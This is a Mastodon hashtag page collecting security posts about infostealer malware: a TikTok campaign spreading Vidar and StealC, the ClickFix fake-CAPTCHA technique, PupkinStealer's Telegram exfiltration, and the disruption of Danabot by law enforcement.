Create accountLogin

Recent searches

No recent searches

Search options

Only available when logged in.
techhub.social is one of the many independent Mastodon servers you can use to participate in the fediverse.
A hub primarily for passionate technologists, but everyone is welcome

Administered by:

Server stats:

4.8K
active users

techhub.social: AboutStatusProfiles directoryPrivacy policy

Mastodon: AboutGet the appKeyboard shortcutsView source codev4.3.8

#infostealer

23 posts19 participants8 posts today
Public
ManiabelChris

Sprecht mit euren TikTok-Kindern!
Trend Research hat eine neue Social-Engineering-Kampagne aufgedeckt, die TikTok nutzt, um die InfoStealer Vidar und StealC zu verbreiten. Bei diesem Angriff werden Videos (möglicherweise KI-generiert) verwendet, um Benutzer anzuweisen, PowerShell-Befehle auszuführen, die als Software-Aktivierungsschritte getarnt sind.
trendmicro.com/de_de/research/
#infosec #datenschutz #datensicherheit #cybercrime #infostealer #tiktok #fedilz

Trend MicroTikTok Videos Promise Pirated Apps, Deliver Vidar and StealC Infostealers InsteadTrend™ Research uncovered a campaign on TikTok that uses videos to lure victims into downloading information stealers, a tactic that can be automated using AI tools.
Public
OTX Bot

Caught in the CAPTCHA: How ClickFix is Weaponizing Verification Fatigue to Deliver RATs & Infostealers

Threat actors are exploiting user fatigue with anti-spam mechanisms through a technique called ClickFix. This method involves compromising websites and embedding fraudulent CAPTCHA images, which, when solved by unsuspecting users, lead to the execution of malicious code. The attack chain typically includes PowerShell commands and the use of legitimate Windows tools to download and execute additional payloads. Common malware delivered through this technique includes Lumma Stealer, NetSupport RAT, and SectopRAT. The success of ClickFix relies heavily on social engineering and user interaction, making user education and awareness crucial in mitigating these attacks. Recommendations include training users to recognize suspicious requests, restricting PowerShell execution, and deploying advanced EDR solutions.

Pulse ID: 682f9d00cee548c073778038
Pulse Link: otx.alienvault.com/pulse/682f9
Pulse Author: AlienVault
Created: 2025-05-22 21:54:08

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

LevelBlue Open Threat ExchangeLevelBlue - Open Threat ExchangeLearn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.
#CAPTCHA#CyberSecurity#EDR
Public
ESET Research

The #FBI and #DCIS disrupted #Danabot. #ESET was one of several companies that cooperated in this effort. welivesecurity.com/en/eset-res
#ESETresearch has been involved in this operation since 2018. Our contribution included providing technical analyses of the malware and its backend infrastructure, as well as identifying Danabot’s C&C servers. Danabot is a #MaaS #infostealer that has also been seen pushing additional malware – even #ransomware, such as #LockBit, #Buran, and #Crisis – to compromised systems.
We have analyzed Danabot campaigns all around the world and found a substantial number of distinct samples of the malware, as well as identified more than 1,000 C&Cs.
This infostealer is frequently promoted on underground forums. The affiliates are offered an administration panel application, a backconnect tool for real-time control of bots, and a proxy server application that relays the communication between the bots and the C&C server.
IoCs are available in our GitHub repo. You can expect updates with more details in the coming days. github.com/eset/malware-ioc/tr

Public
OTX Bot

PupkinStealer .NET Infostealer Using Telegram for Data Theft

PupkinStealer is a newly identified .NET-based information-stealing malware that extracts sensitive data like web browser passwords and app session tokens, exfiltrating it via Telegram. It targets Chromium-based browsers, Telegram, and Discord, focusing on credential theft and session hijacking. The malware performs minimal system discovery, collects files from the desktop, and captures a screenshot. It packages stolen data into a ZIP archive and sends it to the attacker through Telegram's Bot API. PupkinStealer doesn't employ persistence mechanisms, relying on quick execution and low-profile behavior. Its primary evasion technique is leveraging legitimate Telegram infrastructure for communication.

Pulse ID: 682f21f740ee536b48e48783
Pulse Link: otx.alienvault.com/pulse/682f2
Pulse Author: AlienVault
Created: 2025-05-22 13:09:11

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

LevelBlue Open Threat ExchangeLevelBlue - Open Threat ExchangeLearn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.
#Browser#CyberSecurity#DataTheft
ExploreLive feeds
About